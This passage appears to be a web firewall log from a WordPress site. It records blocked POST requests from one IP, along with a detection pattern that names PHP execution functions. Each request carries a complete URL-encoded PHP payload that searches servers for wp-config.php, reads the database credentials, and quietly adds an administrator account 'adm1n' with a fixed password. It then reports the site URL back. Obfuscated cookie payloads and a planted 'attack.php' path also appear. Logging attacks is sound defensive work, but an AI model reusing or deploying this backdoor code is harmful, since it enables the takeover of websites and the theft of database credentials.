20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/includes\/theme.php HTTP\/1.1\ncontent-length:12640\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\ncookie:4=00cb3882c8d180ef2319e46eab0e93ae; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvFKbvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzSwL2IjqTIxVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nIz=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:10:51","213.209.159.254","POST","\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> qV:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php HTTP\/1.1\ncontent-length:12640\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\ncookie:4=36a4c8b62b7aabfcdffca1c8db607abc; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvpILvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYz9uqKEbMKuwMKO0nJ9hplV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nqV=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20